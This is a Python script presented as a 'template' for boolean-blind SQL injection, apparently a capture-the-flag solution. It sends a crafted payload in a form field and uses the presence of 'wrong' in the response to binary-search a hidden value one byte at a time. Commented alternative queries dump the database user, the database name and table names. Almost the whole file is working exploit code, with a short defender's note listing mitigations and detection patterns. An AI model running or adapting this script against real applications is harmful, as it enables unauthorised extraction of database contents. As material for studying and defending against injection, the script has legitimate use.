sqli blind binary search template
#!/usr/bin/env python3
import requests
# One shared Session (keeps connection/cookie state across calls) and a
# module-level switch that routes every request through the local
# interception proxy configured in ``post``.
debug = False
client = requests.Session()
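def post(url, data, headers=None, proxy=False):
    """POST ``data`` to ``url`` through the module-level ``client`` session.

    Args:
        url: Target URL.
        data: Form body handed straight to ``requests.Session.post``.
        headers: Optional header dict. A fixed desktop User-Agent is always
            set; the dict is copied first so the caller's object is not
            mutated between calls.
        proxy: Send this request via the local proxy at 127.0.0.1:8080.
            The module-level ``debug`` flag has the same effect for every
            call (previously ``proxy`` was accepted but ignored).

    Returns:
        The ``requests.Response`` object.
    """
    # Copy rather than mutate: the original wrote into the caller's dict.
    headers = dict(headers) if headers else {}
    headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'
    # Local interception proxy; only consulted when debugging is requested.
    proxies = {'http': 'http://127.0.0.1:8080'}
    if debug or proxy:
        return client.post(url, data=data, headers=headers, proxies=proxies)
    return client.post(url, data=data, headers=headers)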
def exp():
    """Recover bytes one at a time via the response-text oracle in ``post``.

    Reads the module globals ``url`` (assigned under ``__main__``) and
    ``post``. Each outer iteration runs a binary search over 0..256,
    sending the accumulated hex prefix plus a candidate value and using
    whether "wrong" appears in the response body as the yes/no signal.
    The hex string collected in ``flag`` is finally decoded and printed.

    Defender's note: this only works because (a) user input is
    concatenated into the SQL statement and (b) the application returns a
    distinguishable body for the two branches. Parameterised queries
    remove (a); uniform error responses remove (b); and the resulting
    burst of near-identical POSTs to one endpoint (roughly nine per
    recovered byte) is the pattern to alert on server-side.
    """
    # NOTE: ``query`` is assigned but never referenced below; the payload
    # string further down hard-codes its own comparison.
    query = "select user()"
    # query = "select database()"
    # query = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
    # Hex accumulator; the "0x" prefix is stripped again before decoding.
    flag = "0x"
    for index in range(1, 40):
        # Progress indicator only; ``index`` is not used otherwise.
        print(index)
        left = 0
        right = 256
        # Standard binary search; the server's response is the comparator.
        while left <= right:
            guess = (left+right)//2
            # print(guess, left, right)
            tmp = flag + hex(guess)[2:]
            payload = "xx1' or (select * from nocol where id=3) < (3, 0x666c6167, binary %s) or exp(999)#"%(tmp)
            data = {'name':payload}
            r = post(url, data=data)
            # print(r.text)
            # Oracle: the presence of "wrong" in the body decides the branch.
            if "wrong" in r.text:
                left = guess + 1
            else:
                right = guess - 1
        # After the search ``left-1`` is taken as the recovered value.
        flag += hex(left-1)[2:]
    print(bytes.fromhex(flag[2:]))
if __name__ == "__main__":
    # ``url`` is a module global read inside ``exp``; the host is a placeholder.
    url = "http://xxxx/index.php"
    exp()